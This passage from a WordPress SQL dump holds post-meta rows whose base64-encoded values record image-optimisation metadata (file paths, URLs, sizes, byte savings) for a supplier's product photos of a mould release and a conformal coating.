29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTg3MSwiaWQiOjE0NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5ODc0LCJpZCI6MTQ0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk4NzcsImlkIjoxNDQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5ODgxLCJpZCI6MTQ0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk4ODQsImlkIjoxNDQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTg4NiwiaWQiOjE0NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5ODg5LCJpZCI6MTQ0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk4OTUsImlkIjoxNDQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNjksInRpbWUiOjE0ODM1Njk4OTgsImlkIjoxNDQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxOTYsInRpbWUiOjE0ODM1Njk5MDAsImlkIjoxNDQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMTMsInRpbWUiOjE0ODM1Njk5MDMsImlkIjoxNDQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5OTA1LCJpZCI6MTQ0N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTkwOCwiaWQiOjE0NDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NTAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1MDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk5MTEsImlkIjoxNDQ3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29462, 1446, 'wpfc_optimisation_reduction', '2291072'); 
INSERT INTO `wp_postmeta` VALUES (29463, 1446, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwicmVkdWN0aW9uIjoyMjkwOTg0LCJ0aW1lIjoxNDgzNTY5OTIzLCJpZCI6IjE0NDYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTkyNiwiaWQiOjE0NDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5OTI5LCJpZCI6MTQ0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk5MzIsImlkIjoxNDQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5OTM2LCJpZCI6MTQ0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk5MzgsImlkIjoxNDQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTk0MSwiaWQiOjE0NDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5OTQ0LCJpZCI6MTQ0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk5NDcsImlkIjoxNDQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyYy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MmMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJjLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo3NSwidGltZSI6MTQ4MzU2OTk0OSwiaWQiOjE0NDZ9LHsidXJsIjoiaHR0cHM6XC9